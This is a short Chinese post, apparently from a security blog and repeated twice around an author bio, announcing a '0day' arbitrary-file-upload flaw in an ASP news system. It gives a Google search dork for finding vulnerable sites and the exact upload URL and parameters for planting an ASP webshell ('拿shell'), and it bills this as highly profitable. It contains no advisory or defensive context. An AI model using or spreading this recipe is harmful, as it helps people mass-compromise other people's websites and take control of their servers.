今天呢,发布一个0day,是一个任意上传漏洞。 谷歌关键字:inurl:newslist.asp?NodeCode= 然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp 任意上传拿shell 很吃香哦 出图测试
阿峰
十年以上网络安全经验,目前专注金融行业网络安全,技术驱动金融创新,网络安全与金融科技同发展。
今天呢,发布一个0day,是一个任意上传漏洞。 谷歌关键字:inurl:newslist.asp?NodeCode= 然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp 任意上传拿shell 很吃香哦 出图测试